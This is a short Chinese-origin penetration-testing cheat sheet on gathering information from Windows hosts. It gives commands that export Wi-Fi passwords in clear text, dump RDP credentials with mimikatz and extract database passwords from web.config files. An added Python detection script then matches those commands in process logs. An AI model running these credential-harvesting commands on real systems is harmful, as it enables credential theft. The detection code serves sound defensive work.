Network penetration - registry information gathering
PowerShell script that collects installed programs from the registry:
https://github.com/3gstudent/ListInstalledPrograms
Get the system proxy settings:
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Get startup items:
reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get Wi-Fi passwords (replace WLAN with the actual interface name):
netsh wlan export profile interface=WLAN key=clear folder=C:\
Export RDP passwords with mimikatz:
mimikatz's dpapi::cred
Run in the root directory
dir /b /s web.config >> tmps.logs
Given the known field names for the database connection account and password, findstr can be used to extract the sa password in bulk from the specified web directory:
findstr /c:"User Id=" /c:"Password=" /si web.config >> C:/inetpub/tmps.logs
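From the defender's side, the commands listed above leave recognizable command lines in process-creation logs. The following is an added example, not part of the original page, that matches those command lines and flags an account that runs several of them; the rule names, event fields and sample events are constructed assumptions.

```python
import re
from collections import defaultdict

# Rule names are hypothetical labels; each pattern mirrors a command on this page.
RULES = {
    "proxy_settings_query": r"\breg(\.exe)?\s+query\b.*\\CurrentVersion\\Internet Settings",
    "run_key_query": r"\breg(\.exe)?\s+query\b.*\\CurrentVersion\\Run\b",
    "wlan_cleartext_export": r"\bnetsh(\.exe)?\s+wlan\s+export\s+profile\b.*\bkey=clear\b",
    # dir is a cmd.exe builtin, so it is only logged when passed to cmd /c.
    "webconfig_enumeration": r"\bdir\b(?=.*\s/s\b).*\bweb\.config\b",
    "webconfig_credential_grep": r"\bfindstr(\.exe)?\b.*password=.*\bweb\.config\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}


def match_rules(command_line):
    """Return the names of all rules the command line matches."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]


def triage(events, threshold=2):
    """Group hits per (host, user); keep those with >= threshold distinct rules."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev["command_line"]):
            hits[(ev["host"], ev["user"])].add(name)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= threshold}


# Constructed sample events (not real telemetry); field names are assumptions.
SAMPLE_EVENTS = [
    {"host": "WEB01", "user": "svc_iis", "command_line":
     r'reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"'},
    {"host": "WEB01", "user": "svc_iis", "command_line":
     r"reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"host": "WEB01", "user": "svc_iis", "command_line":
     r"cmd.exe /c dir /b /s web.config >> tmps.logs"},
    {"host": "WEB01", "user": "svc_iis", "command_line":
     r'findstr /c:"User Id=" /c:"Password=" /si web.config >> C:/inetpub/tmps.logs'},
    {"host": "HR02", "user": "bob", "command_line":
     r"netsh wlan export profile key=clear folder=C:\temp"},
    {"host": "LAPTOP7", "user": "alice", "command_line": "netsh wlan show profiles"},
    {"host": "LAPTOP7", "user": "alice", "command_line":
     r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'},
]

if __name__ == "__main__":
    for key, names in triage(SAMPLE_EVENTS).items():
        print(key, names)
```

A single hit such as the HR02 Wi-Fi export stays below the default threshold; lower `threshold` to 1 to review every match.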